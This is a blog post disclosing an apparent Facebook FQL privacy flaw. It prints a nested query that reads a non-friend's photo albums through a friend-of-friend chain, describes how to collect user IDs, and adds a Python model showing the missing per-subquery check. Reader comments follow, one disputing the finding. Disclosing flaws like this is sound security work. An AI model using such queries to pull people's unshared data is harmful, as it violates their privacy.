Making Facebook a secure place - FQL security issue


Last weekend I was lucky to notice an online “hacker” challenge, Miracle on Thirty-Hack Street, and I thought I would give it a try.
I started solving the puzzle and ended up with more than a solution to the task. My final conclusion was the following:
I have no privacy from FQL developers on Facebook (anyone with a Facebook account can use FQL). They can see my data without being on my friend list… :(

Let's say there are Person A, Person B, Person C, Person D, Person E, … on Facebook, and they are connected in the following way:

Person A is friends with Person B, but not with Person C, Person D or Person E

Person B is friends with Person C, but not with Person D or Person E

Person C is friends with Person D, but not with Person E

Person D is friends with Person E

 

All of the persons are standard Facebook users: they have no applications installed on their accounts and they have locked their profiles so that they can be viewed only by their friends.

This means that Person A can see the information of Person B only.

“<=>” - can see each other's profile and shared information.

Person A <=> Person B

Person B <=> Person C

Person C <=> Person D

Person D <=> Person E

 

What does the security flaw allow Person A to do?
With the current security settings on FQL (Facebook Query Language), Person A is allowed to see all of the information of Person C, Person D and Person E!

 

 

This is a huge security flaw, and it leads to the conclusion: I have no privacy from any Facebook developer who uses FQL.
They can write an FQL statement that returns my Facebook information, provided they manage to find or create a chain of friendships like the one described above. In other words, every friend of my friends who understands FQL can see all of my protected data…

Proof of the above:

Let's say I'm Person A and, as above, I'm friends with Person B. I'm not friends with Person C, but I want to see his data: his status messages, his photo albums and pictures, notes, …
All I need is the ID numbers of the accounts involved.

 

What is the ID of an account/user? Facebook profile URLs have the structure www.facebook.com/profile.php?ref=name&id=this_number_is_user_id and can be viewed by everyone. Just go to Person B's friend list and hover over the link to Person C; the status bar of the browser shows his/her user ID. With the needed info collected, I can do the following:

Info I have:

Person A : user_A_id

Person B : user_B_id

Person C : user_C_id

I want to see Person C's albums, if there are any. After executing the following FQL query I'll have the needed information. user_A_id is my own ID, user_B_id is my friend's and user_C_id is the victim's (someone I'm not friends with). The inner subquery reads only my own friend list, which I'm allowed to see, and returns Person B's ID; the outer subquery reads the victim's friend list and returns the victim's ID if Person B is on it:

select
    aid,
    cover_pid,
    name,
    created,
    description,
    location,
    size,
    link,
    visible,
    type
from
    album
where
    owner in (
        select uid1
        from friend
        where uid1 = user_C_id
          and uid2 in (
              select uid2
              from friend
              where uid1 = user_A_id
                and uid2 = user_B_id
          )
    )

Perfect!

I have the IDs of Person C's photo albums, so now I can write a statement that fetches the victim's pictures from them.

Note: the privacy settings on the albums don't change anything!
(I can't see the profile from a browser or get any info from it, only the option to add as a friend.)

What does this mean? I can take absolutely all of the data of Person C only because Facebook evaluates the query like this:

    • I have a valid session for executing the query because I included my own ID, and the inner subquery over my friend Person B is one I'm allowed to run. The platform does not check that the outer subquery drags in a resource I'm forbidden to read (and I can't discover that data from the Facebook front end).

    • Then I should only get data I'm allowed to see (my own, and what my friends share with me) - fail! I get Person C's data, which I can't see anywhere in the FB web interface.

 

With the statement above I join the owner field of the album table to the uid of the victim. This is an example with Person A, Person B and Person C, but the same construction gives us a way to find or build a chain of users of unlimited length and pull their personal information that was never shared with us: every additional hop is one more nested subquery over the friend table.
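To make the access-control failure concrete, here is an added example (not code from the original post, and not FQL itself): a small Python model of the nested friend/album lookup, run once the way the post says Facebook behaved (only the caller's own session and innermost subquery are checked) and once with a per-row visibility check applied to every subquery. Users A to E, the friendship edges and the album rows are constructed sample data; the names enforce, friends_along_path, select_from_friend and exploit_query are this example's own. It also generalises the post's three-person case to a path of any length, as the paragraph above describes.

```python
"""
Model of the nested FQL friend/album lookup from the post, with and without
a visibility check on each subquery. All data below is constructed.
"""
from dataclasses import dataclass

# Constructed sample data: the chain from the post (A~B, B~C, C~D, D~E).
FRIENDS = {("A", "B"), ("B", "C"), ("C", "D"), ("D", "E")}


@dataclass(frozen=True)
class Album:
    aid: str
    owner: str
    visible: str  # "friends" (profile locked to friends) or "everyone"


ALBUMS = [
    Album("alb_B", "B", "friends"),
    Album("alb_C", "C", "friends"),
    Album("alb_C_public", "C", "everyone"),
    Album("alb_E", "E", "friends"),
]


def are_friends(u, v):
    return (u, v) in FRIENDS or (v, u) in FRIENDS


def friends_of(uid):
    """Everyone who appears together with uid in the friend table."""
    return {v for u, v in FRIENDS if u == uid} | {u for u, v in FRIENDS if v == uid}


def album_visible_to(viewer, album):
    """Album privacy as the post describes it: owner, friends only, or everyone."""
    if viewer == album.owner or album.visible == "everyone":
        return True
    return album.visible == "friends" and are_friends(viewer, album.owner)


def select_from_friend(viewer, uid1, uid2_in, want, enforce):
    """Model of:  select <want> from friend where uid1 = <uid1> and uid2 in <uid2_in>
    want is "uid1" or "uid2". With enforce=True a row is readable only when the
    viewer is one of its two parties (you may read your own friend list, not
    someone else's). enforce=False reads any row, which is what the post reports."""
    rows = {(uid1, other) for other in friends_of(uid1) if other in uid2_in}
    if enforce:
        rows = {row for row in rows if viewer in row}
    return {row[0] if want == "uid1" else row[1] for row in rows}


def select_from_album(viewer, owners, enforce):
    """Model of:  select aid, ... from album where owner in <owners>"""
    rows = [a for a in ALBUMS if a.owner in owners]
    if enforce:
        rows = [a for a in rows if album_visible_to(viewer, a)]
    return sorted(a.aid for a in rows)


def friends_along_path(viewer, path, enforce):
    """The nested friend subqueries, generalised to a path of any length.
    The innermost level reads the viewer's own friend list (the 'allowed'
    query); each level above it reads the next user's friend list, keyed on
    the ids the level below returned. path[0] must be a real friend of viewer."""
    ids = select_from_friend(viewer, viewer, {path[0]}, "uid2", enforce)
    for target in path[1:]:
        ids = select_from_friend(viewer, target, ids, "uid1", enforce)
    return ids


def exploit_query(viewer, path, enforce=False):
    """The post's query: albums of the last user on the path, reached through
    the chain of friendships. Returns the album ids the viewer gets back."""
    return select_from_album(viewer, friends_along_path(viewer, path, enforce), enforce)


if __name__ == "__main__":
    for path in (["B"], ["B", "C"], ["B", "C", "D", "E"]):
        print(path,
              "unchecked:", exploit_query("A", path, enforce=False),
              "checked:", exploit_query("A", path, enforce=True))
```

With enforce=False, A reaches C's locked album through B and even E's album through the full chain; with enforce=True the outer friend-table row (C, B) is not readable by A, so the chain stops at the first hop and A still sees B's album (a real friend) and only C's "everyone" album. The point is that the check has to run on every row of every subquery, not once at the entry point.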

 

For extra information for testing, I'll point all of you to these pages:

http://wiki.developers.facebook.com/index.php/FQL_Tables

and, of course, a tool for trying out FQL statements:

http://developers.facebook.com/tools.php (API test console; choose the method fql.query). Write your query in the text area and see your results.

At this moment I'm going to poke Facebook's service about this security flaw, so that they can react and we can “live” in a safer community, without mean web developers looking at everyone's photos :).

 

 

  • I cannot believe this will work!

  • Can be done by modifying a web URL as well... not just through FQL.

    Yes, the article raises concerns about the new privacy feature, but no, it's not a security issue, as it's based around settings and requires a half-trusted connection, i.e. they are still a friend of a friend. You can't create an account and just visit someone's protected information; you require a base link.

  • Great idea, thanks for this tip!

  • I tested; while it returns results, I'm not sure it's highlighting a permissions issue with Facebook. I can still only see albums set with 'Everyone' and 'Friends of Friends' permissions, and cannot see ones where the settings are correct.

    Are you publishing all of your code?